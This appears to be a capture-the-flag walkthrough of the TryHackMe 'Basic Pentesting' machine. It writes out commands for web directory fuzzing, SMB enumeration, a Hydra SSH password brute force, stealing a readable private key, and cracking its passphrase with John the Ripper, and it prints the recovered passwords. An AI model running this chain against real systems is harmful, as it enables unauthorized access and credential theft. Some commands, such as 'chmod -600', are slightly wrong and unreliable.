THM Basic Pen-Testing Machine
Target IP Address
10.10.142.239Nmap Scan Report
Open Ports and services
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxySo there are lots of open Ports so we can enumerate one by one some of these are used to gain an initial foothold.
Web server Enumeration
Hidden Directory Scan
$ ffuf -w /usr/share/wordlist/dirbuster/directory-list-2.3-small.txt -u https://$IP/FUZZ
/developmentThis hidden directory has some text that gives us clue that there are two users one name starts with j and the other user's name starts with k also they give us a clue one of the users has a weak password.
SMB Enumeration
Using Nmap smb enumeration scripts we found the following shares
$ nmap --script=smb-enum $IP
| smb-enum-shares:
| account_used: guest
| \10.10.142.239\Anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\samba\anonymous
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \10.10.142.239\IPC$:
| Type: STYPE_IPCHIDDEN
| Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITEThe above Result shows that we have guest user share with anonymous access.
by Enumerating the smb with the Nmap smb-users-enum script or metasploit module or some other techniques we found these valid users.
Using Smb we found Two user
Jankay
Now we have valid users so we can use brute forcing to try to get these users' ssh passwords as they have ssh service open. In the web server enumeration stage, we know one of them has a weak password so we can use hydra to bruteforce the user's password
Hydra Bruteforce Result
Using Brute force we found a valid user password
userName: jan
password: armandoNow we have the jan user password so we ssh to the machine to get the foothold using the command
$ ssh jan@10.10.142.239
password armandoNow we have initial access to the system so now we use the other post-exploitation techniques to get more privileges. We can use the linpeas script to find privilege escalation vectors. The linpeas shows that the kay user has an ssh private key that is readable to the Jan user so we can read it and copy all the content of that key to our attacking machine change the permission of that key so that only you can read it with the following command
$ chmod -600 kay_rsaThis will change the permission of the key to read/write only for you so now you can ssh to the kay user with that key using the following command
$ ssh -i kay_rsa kay@10.10.142.239This command is used to ssh to that target machine with the private key of the kay user. So by running the above command we have found that this key is protected by a password so which means we also need a password to login.
So digging for the password we can use the sshtojohn script to get that private key password hash that is understandable to John the Ripper tool.
$ python ssh2john.py kay_rsa > kay_rsa.hashThis will create the hash file of the key and store it in the kay_rsa.hash file now we use John to crack the hash or to get the password
$ john kay_rsa.hash --wordlist=rockyou.txtThis will crack the password using the wordlist rockyou.txt
Using Bruteforce with John we found the user kay ssh key password
Username: kay
Password: beeswaxSo now we have the ssh key password so we can use it to get access to the kay user
$ ssh -i kay_rsa kay@10.10.142.239
password beeswaxAnd this is the final password we found after successful login
heresareallystrongpasswordthatfollowsthepasswordpolicy$$Last updated
Was this helpful?